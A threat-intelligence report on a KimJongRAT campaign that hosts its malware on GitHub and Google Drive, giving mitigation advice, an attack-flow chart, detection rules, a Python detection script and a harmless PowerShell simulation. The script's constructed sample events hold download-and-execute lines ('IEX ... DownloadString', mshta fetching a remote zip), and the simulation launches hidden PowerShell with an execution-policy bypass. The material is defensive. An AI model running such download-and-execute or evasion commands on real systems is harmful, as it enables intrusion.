KimJongRAT Continues to Evolve Through Living Off Trusted Sites
Summary
A recent KimJongRAT campaign has been observed using GitHub Releases and Google Drive as trusted platforms to host and deliver malware. This updated variant blends InfoStealer and RAT functionality and relies on Living Off Trusted Sites (LOTS) techniques, hiding its downloads behind services that most organizations allow by default, to lower the chance of detection. It has also evolved to read its command-and-control address from Google Drive at run time, so operators can rotate infrastructure without recompiling the payload.
Investigation
The investigation reviewed a May 2026 campaign in which victims were redirected through shortened links to GitHub-hosted ZIP archives containing malicious LNK files. Researchers mapped the execution chain, including abuse of mshta.exe, VBScript, and PowerShell to launch multi-stage payloads. The analysis also uncovered a new capability involving deployment of MeshAgent for long-term remote access.
Mitigation
Organizations should tightly control the execution of LNK files and mshta.exe when they originate from untrusted locations, in particular LNK files launched out of archive extraction directories and mshta.exe invoked with a remote URL. Monitoring PowerShell for hidden-window launches, Base64-encoded command lines, and downloads from cloud services such as Google Drive and GitHub is essential, because the payload deliberately hides behind platforms that are usually allow-listed. Restricting unauthorized remote management tools such as MeshAgent limits what an intruder can do after the initial compromise.
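The checks above can be expressed as a handful of simple rules over endpoint telemetry. The Python script below is an added example, not code from the original report or from any detection vendor: it runs miniature versions of those checks (execution out of a 7-Zip temp directory, mshta.exe launching remote content, hidden or encoded PowerShell, suspicious PowerShell strings, and script hosts connecting to GitHub or Google Drive) over a few constructed Sysmon-style events. The field names (EventType, Image, ParentImage, CurrentDirectory, CommandLine, DestinationHostname), the 7-Zip temp-directory pattern, the list of trusted download hosts and every sample command line are assumptions made for the example, not indicators taken from the campaign.

```python
"""Added example: a miniature detection pass over constructed Sysmon-style events.

Not code from the original report. Field names, host lists, the 7-Zip temp
directory pattern and every sample command line below are assumptions made for
illustration, not indicators taken from the campaign.
"""
import base64
import re

# Constructed payload for the encoded-command sample (assumption, not an IOC).
ENCODED_PAYLOAD = ("IEX (New-Object Net.WebClient).DownloadString("
                   "'https://drive.google.com/uc?id=EXAMPLE')")
# PowerShell -EncodedCommand takes Base64 of the UTF-16LE script text.
ENC = base64.b64encode(ENCODED_PAYLOAD.encode("utf-16-le")).decode("ascii")

# Constructed Sysmon-style telemetry: one benign event, several suspicious ones.
SAMPLE_EVENTS = [
    {"EventType": "process_creation", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe",
     "CurrentDirectory": r"C:\Users\u"},
    # LNK opened from inside 7-Zip: parent is 7zFM.exe, cwd is its temp dir, target is mshta.exe
    {"EventType": "process_creation", "ParentImage": r"C:\Program Files\7-Zip\7zFM.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://github.com/EXAMPLE/EXAMPLE/releases/download/v1/pdfko.zip",
     "CurrentDirectory": r"C:\Users\u\AppData\Local\Temp\7zO4C2A1"},
    # Hidden PowerShell with execution-policy bypass (the pattern used in the simulation below)
    {"EventType": "process_creation", "ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log",
     "CurrentDirectory": r"C:\Users\u"},
    # Hidden PowerShell with a Base64 (UTF-16LE) encoded command
    {"EventType": "process_creation", "ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENC}",
     "CurrentDirectory": r"C:\Users\u"},
    # A script host talking to a trusted cloud site
    {"EventType": "network_connection",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "DestinationHostname": "drive.google.com", "DestinationPort": 443},
    # A browser reaching GitHub is normal and must not fire
    {"EventType": "network_connection",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationHostname": "github.com", "DestinationPort": 443},
]

# Assumed temp-directory naming of 7-Zip (7z...), WinRAR (Rar$...) and Explorer (Temp1_).
ARCHIVE_TEMP_RE = re.compile(r"\\Temp\\(?:7z[A-Za-z0-9]+|Rar\$[A-Za-z0-9]+|Temp1_)", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
BYPASS_RE = re.compile(r"-e(?:p|xecutionpolicy)?\s+bypass", re.I)
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)
SUSPICIOUS_RE = re.compile(
    r"\b(?:iex|invoke-expression|downloadstring|downloadfile|frombase64string|start-bitstransfer)\b", re.I)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}
TRUSTED_SITES = {"github.com", "raw.githubusercontent.com", "objects.githubusercontent.com",
                 "drive.google.com", "drive.usercontent.google.com"}


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument (Base64 of UTF-16LE), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def rule_execution_from_archive(e):
    """Process started by 7zFM.exe or running out of an archive tool's temp directory."""
    if e.get("EventType") != "process_creation":
        return False
    in_temp = ARCHIVE_TEMP_RE.search(e.get("CurrentDirectory", "") + " " + e.get("CommandLine", ""))
    return _basename(e.get("ParentImage", "")) == "7zfm.exe" or in_temp is not None


def rule_mshta_remote_content(e):
    """mshta.exe given a URL on its command line."""
    return (e.get("EventType") == "process_creation"
            and _basename(e.get("Image", "")) == "mshta.exe"
            and re.search(r"https?://", e.get("CommandLine", ""), re.I) is not None)


def rule_hidden_powershell(e):
    """Hidden-window PowerShell combined with a policy bypass or an encoded command."""
    if e.get("EventType") != "process_creation" or _basename(e.get("Image", "")) not in {"powershell.exe", "pwsh.exe"}:
        return False
    cl = e.get("CommandLine", "")
    return HIDDEN_RE.search(cl) is not None and bool(BYPASS_RE.search(cl) or ENCODED_RE.search(cl))


def rule_suspicious_powershell_strings(e):
    """Download/eval primitives or trusted-site hosts in the raw or decoded command line."""
    if e.get("EventType") != "process_creation" or _basename(e.get("Image", "")) not in {"powershell.exe", "pwsh.exe"}:
        return False
    cl = e.get("CommandLine", "")
    text = cl + " " + (decode_encoded_command(cl) or "")
    return SUSPICIOUS_RE.search(text) is not None or any(h in text.lower() for h in TRUSTED_SITES)


def rule_script_host_cloud_connection(e):
    """A script host (not a browser) opening a connection to GitHub or Google Drive."""
    return (e.get("EventType") == "network_connection"
            and _basename(e.get("Image", "")) in SCRIPT_HOSTS
            and e.get("DestinationHostname", "").lower() in TRUSTED_SITES)


RULES = [
    ("Execution from ZIP Archive [7zip]", rule_execution_from_archive),
    ("Mshta launching remote content", rule_mshta_remote_content),
    ("Hidden PowerShell command line", rule_hidden_powershell),
    ("Suspicious PowerShell strings", rule_suspicious_powershell_strings),
    ("Script host connecting to trusted cloud site", rule_script_host_cloud_connection),
]


def run_detections(events):
    """Return (event_index, rule_name) pairs for every rule that fires on every event."""
    return [(i, name) for i, e in enumerate(events) for name, fn in RULES if fn(e)]


if __name__ == "__main__":
    for idx, name in run_detections(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
```

The encoded-command rule decodes the Base64 argument before string-matching; without that step, "-enc" launches would slip past every content-based check, which is precisely why the page's Mitigation section singles out Base64-encoded commands. The network rule is scoped to script hosts so that ordinary browser traffic to GitHub or Google Drive does not generate noise.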
Response
If this activity is detected, isolate affected hosts immediately to prevent lateral movement and data exfiltration. Conduct memory forensics to identify any active malicious DLLs (sys.dll in the observed chain) or PowerShell components, and check for an installed MeshAgent. Review proxy and endpoint logs for Google Drive and GitHub traffic tied to the identified infrastructure, and update endpoint detections with the extracted indicators of compromise.
Attack Flow
```mermaid
flowchart TD
    step_initial_access["T1566.001 & T1566.002 - Phishing: Spearphishing Attachment/Link: Lured via shortened URLs to download tax_edoc.zip from GitHub"]
    step_user_execution["T1204.002 - User Execution: Malicious File: Victim opens a malicious LNK file from the extracted ZIP"]
    rules_for_user_execution("<b>Rule Name</b>: Execution from ZIP Archive [7zip] (via process_creation)<br/><b>Rule ID</b>: 43917da8-4e9a-4cd2-b3f9-dc60e2326534")
    step_proxy_execution["T1218.005 - System Binary Proxy Execution: Mshta: Uses Mshta to download and execute pdfko.zip from GitHub"]
    step_script_execution["T1218.001 & T1216.002 - System Binary/Script Proxy Execution: Obfuscated VBScript in HTA uses Compiled HTML File and SyncAppvPublishingServer"]
    step_decoy_steganography["T1027.003 - Obfuscated Files or Information: Steganography: Downloads a decoy document to distract the user"]
    step_branching{"Environment Check: Determines if Windows Defender is active"}
    step_defender_inactive["T1027 & T1218.011 - Obfuscated Files & Rundll32: Downloads encrypted user.txt/sys.log via AES/RC4 and executes sys.dll"]
    step_defender_active["T1027.006 - Obfuscated Files or Information: HTML Smuggling: Executes PowerShell 1.ps1 to decode KimJongRAT"]
    step_persistence_c2["T1219 & T1568 & T1578 - Persistence & C2: Installs MeshAgent and uses Dynamic Resolution via Google Drive to update C2 addresses"]
    step_initial_access -->|leads_to| step_user_execution
    step_user_execution -->|leads_to| step_proxy_execution
    step_user_execution -.->|detected_by| rules_for_user_execution
    step_proxy_execution -->|leads_to| step_script_execution
    step_script_execution -->|leads_to| step_decoy_steganography
    step_decoy_steganography -->|leads_to| step_branching
    step_branching -->|if_inactive| step_defender_inactive
    step_branching -->|if_active| step_defender_active
    step_defender_inactive -->|leads_to| step_persistence_c2
    step_defender_active -->|leads_to| step_persistence_c2
```
Detections
- Possible Google Drive Phishing (via proxy)
- Suspicious CURL Usage (via cmdline)
- The Possibility of Execution Through Hidden PowerShell Command Lines (via cmdline)
- Suspicious Powershell Strings (via cmdline)
- Suspicious Powershell Strings (via powershell)
- Suspicious Extracted Files from an Archive (via file_event)
- Execution from ZIP Archive [7zip] (via process_creation)
- KimJongRAT Malicious Download and C2 Communication Detection [Windows Network Connection]
- Detect KimJongRAT PowerShell Execution [Windows PowerShell]
- KimJongRAT Execution Using mshta and Command-Line Checks [Windows Process Creation]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section details the execution of the adversary technique (TTP) that the detection rule is designed to catch. The commands must reflect the TTPs identified above and generate the telemetry the detection logic expects; an abstract or unrelated example would produce a false verdict on whether the rule works.
Attack Narrative & Commands: The adversary has gained a foothold and is attempting to execute the KimJongRAT payload. To evade simple signature-based detection, the malware runs a PowerShell script in a hidden window, bypasses the execution policy, and passes a log filename as a parameter that the script uses to handle its encrypted configuration. The goal is to establish a persistent, stealthy remote access trojan (RAT) on the victim machine. The command below reproduces the exact command-line pattern identified in the detection rule to validate the "selection_execute" logic; it launches only a harmless placeholder script.
Regression Test Script:
```powershell
# Simulation of the KimJongRAT execution pattern.
# Create a harmless placeholder script so that the '-File' argument resolves.
"Write-Output 'Simulating KimJongRAT Payload'" | Out-File -FilePath "1.ps1" -Encoding ascii

# Launch PowerShell with the command-line arguments the detection rule looks for:
# hidden window, execution-policy bypass, no profile, a -File script and a log filename.
# The placeholder script declares no parameters, so "-FileName 1.log" simply lands in $args.
# Run this from the directory where 1.ps1 was written, since the path is relative.
Start-Process powershell.exe -ArgumentList "-ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log" -WindowStyle Hidden
```
Cleanup Commands:
```powershell
# Remove the placeholder files created during the simulation.
Remove-Item -Path "1.ps1" -ErrorAction SilentlyContinue
Remove-Item -Path "1.log" -ErrorAction SilentlyContinue
```